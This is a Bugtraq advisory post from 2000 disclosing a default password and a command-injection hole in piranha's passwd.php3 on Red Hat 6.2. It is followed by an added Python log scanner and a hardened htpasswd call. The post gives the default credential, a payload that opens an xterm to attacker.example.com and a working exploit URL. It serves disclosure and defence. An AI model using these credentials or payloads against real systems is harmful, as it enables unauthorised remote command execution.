Bugtraq mailing list archives
piranha default password/exploit
From: vision () WHITEHATS COM (Max Vision)
Date: Mon, 24 Apr 2000 17:42:28 -0700
Hi,

In the interest of full disclosure (I used an alias the last few times, let's see how this goes as me) here are the details of the piranha vulnerability.

RE: ISS Security Advisory iss.00-04-24.Piranha

To summarize, piranha is a GUI tool for monitoring, configuring, and administering an LVS cluster. The Redhat 6.2 package piranha-0.4.12 supports a web-based php3 interface which is protected by basic authentication. A default account is provided that, if known, would allow remote users to change the piranha password as well as run arbitrary commands on the web server by exploiting a hole in the passwd.php3 script.

First the IDS Signature to detect the attack:
http://whitehats.com/IDS/272
(See http://whitehats.com/ids/ for basic information about using signatures to detect attacks on your network.)

Now the exploit:

There are basically two problems with the piranha-0.4.12 package, that when combined yield shell access for an attacker. The reason earlier versions are not vulnerable is because of the shift away from the gui, towards a web-based php3 interface.

The first problem is the default account and password that protect the web directory containing the administrative php3 scripts. This is what ISS called a "backdoor" - which is actually a default password. (If ISS found something other than what I found, please email me...)

The default username/password is: piranha/q

Now the ironic part is, the second part of the vulnerability lies within the program that is used to change the password! By default this is installed into /home/httpd/html/piranha/secure as passwd.php3, or:
http://victim.example.com/piranha/secure/passwd.php3

Once you authenticate (see first vulnerability), a form will come up asking for the new password. To avoid typo-regret, you must enter the password twice. It will then proceed to change the piranha password to whatever you provided as the new password. It does this by passing your input to a shell command without filtering for metacharacters...

passwd.php3:

    echo "<TD>The passwords you supplied match<BR>";
    $temp = `/usr/bin/htpasswd -b passwords piranha $try1`;

As one can see, this allows for more creative "new passwords", such as this one:

    g23 ;/usr/X11R6/bin/xterm -display attacker.example.com:0 -ut;

Example exploit URL (requires authentication):
http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT

Fix is available for x86 RH 6.2 users at
ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.13-1.i386.rpm

--
Max Vision Network Security <vision () whitehats com>
Network Security Assessment http://maxvision.net/
100% Success Rate : Penetration Testing & Risk Mitigation
Free Visibility Analysis and Price Quote for Your Network
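As an added example (not part of Max Vision's post or the piranha package), the two defender-side pieces the post implies: a log check that flags passwd.php3 requests whose try1/try2 values carry shell metacharacters, and the quoted form of the htpasswd call that the backtick line should have used. The log lines are constructed; the first reuses the example URL from the post.

```python
import re
import shlex
from urllib.parse import urlsplit, parse_qs

# Characters that let a "new password" break out of the unquoted backtick call.
SHELL_META = re.compile(r"[;&|`$()<>\n]")


def flag_passwd_request(url):
    """Return {param: decoded value} for try1/try2 values that carry shell
    metacharacters. Only requests for /piranha/secure/passwd.php3 are inspected."""
    parts = urlsplit(url)
    if not parts.path.endswith("/piranha/secure/passwd.php3"):
        return {}
    hits = {}
    for name, values in parse_qs(parts.query).items():
        if name in ("try1", "try2"):
            for value in values:
                if SHELL_META.search(value):
                    hits[name] = value
    return hits


def scan_access_log(lines):
    """Run flag_passwd_request over the request URL of each combined-format log line."""
    findings = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m and (hits := flag_passwd_request(m.group(1))):
            findings.append((m.group(1), hits))
    return findings


def safe_htpasswd_command(new_password):
    """Hardened form of the passwd.php3 call: the password becomes a single quoted
    word (shlex.quote is the Python analogue of PHP's escapeshellarg)."""
    return "/usr/bin/htpasswd -b passwords piranha " + shlex.quote(new_password)


# Constructed sample log lines (hypothetical hosts, not from the original post).
SAMPLE_LOG = [
    '10.0.0.5 - piranha [24/Apr/2000:17:42:28 -0700] "GET /piranha/secure/passwd.php3'
    '?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT HTTP/1.0" 200 512',
    '10.0.0.6 - piranha [24/Apr/2000:17:50:01 -0700] "GET /piranha/secure/passwd.php3'
    '?try1=Str0ngPass&try2=Str0ngPass&passwd=ACCEPT HTTP/1.0" 200 512',
    '10.0.0.7 - - [24/Apr/2000:17:51:13 -0700] "GET /piranha/index.php3 HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for url, hits in scan_access_log(SAMPLE_LOG):
        print("suspicious passwd.php3 request:", hits)
```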